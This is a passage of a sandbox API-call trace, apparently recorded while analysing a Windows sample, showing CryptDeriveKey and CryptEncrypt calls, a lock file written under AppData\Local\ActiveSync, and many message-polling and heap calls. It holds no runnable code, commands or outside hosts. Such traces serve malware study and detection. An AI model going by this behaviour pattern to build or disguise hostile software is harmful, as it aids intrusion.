lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0152.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaacd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0152.585] CryptDeriveKey (in: hProv=0x9be9a0, Algid=0x6601, hBaseData=0x9e20b8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20f8) returned 1 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.585] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.585] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.585] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0152.585] CryptDestroyHash (hHash=0x9e20b8) returned 1 [0152.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/ActiveSync" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\activesync"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.586] GetLastError () returned 0x5 [0152.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.587] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0152.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.ActiveSync" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.activesync"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.588] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.589] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.589] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.589] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.589] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.589] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.589] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.591] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.591] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.592] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.593] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.593] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.594] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72738*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72738*, pdwDataLen=0x8cef60*=0x8) returned 1 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.594] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.594] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.594] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.594] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.594] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.594] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.594] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.594] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.594] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.595] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.595] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.595] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.595] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.595] WriteFile (in: hFile=0x4f8, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0152.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0152.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0152.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | 